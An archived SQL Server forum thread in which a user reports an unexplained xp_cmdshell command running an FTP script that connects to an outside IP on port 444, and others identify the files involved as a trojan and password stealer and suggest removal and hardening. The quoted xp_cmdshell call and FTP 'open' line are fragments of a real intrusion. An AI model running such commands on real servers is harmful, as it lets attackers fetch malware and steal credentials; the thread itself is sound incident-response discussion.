SQL Server Performance Forum – Threads Archive
xp_cmdshell "ftp -s:c:winntaxis.cmd"I saw this to one of my processes (spid 53). And no internal developer/user is running this command. Could this be a virus or hacker? Anyone seen this before? Thanks,
Cheek this I found on net: http://www.systemsaxis.co.uk/diplomat2000/support/errors.htm Luis Martin …Thus mathematics may be defined as the subject in which we never know what we are talking about, nor whether what we are saying is true.
I think somebody’s trying to hack my machine. This is the detail of the axis.cmd:
open 18.104.22.168 444
EXIT Any help would be greatly appreciated. Jon M
I couldn’t even delete the process nor delete the user login. Help! [B)] Jon M [xx(]
I found some detail that may be of use when I went hunting the individual details in the axis.cmd that you listed Tzolibr.dll is found in a few virus/trojan horses and info gathers.
Sud.exe is listed as a backdoor thing-y (forgive my lack of technical use, if its not sql related, I probably dont know the language). It is a password stealer so its quite important that you deal with it immediately.
There is some more detailed info about sud.exe athttp://www3.ca.com/virusinfo/virus.aspx?ID=9739
This is the closes MS info on ithttp://www.microsoft.com/technet/security/bulletin/ms00-057.asp What you have looks like a version of this, probably with some basic file names to make it less detectable. Check the virus sites, and microsoft for information on removing this. Start with a google search on sud.exe and see where it leads you, then subsearch etc, until you find an exact enough listing. And look into a good virus blocking tool and make sure you get updates regularly for it. Good luck and keep us posted.
Piggy-backing on Chris I suggest you take a look at http:www.sqlsecurity.com .
Very good information on how to secure your server. Hm… I think somewhere I have the source from Openhack 2002 on my computer. IIRC there was a description by Microsoft on the absolute minimum permission needed to run SQL Server. If wanted, just post and I’ll dig. Frank
Sorry, too dumb to hack in the coorect link this morning[:I]
Thanks for all the info guys. Jon M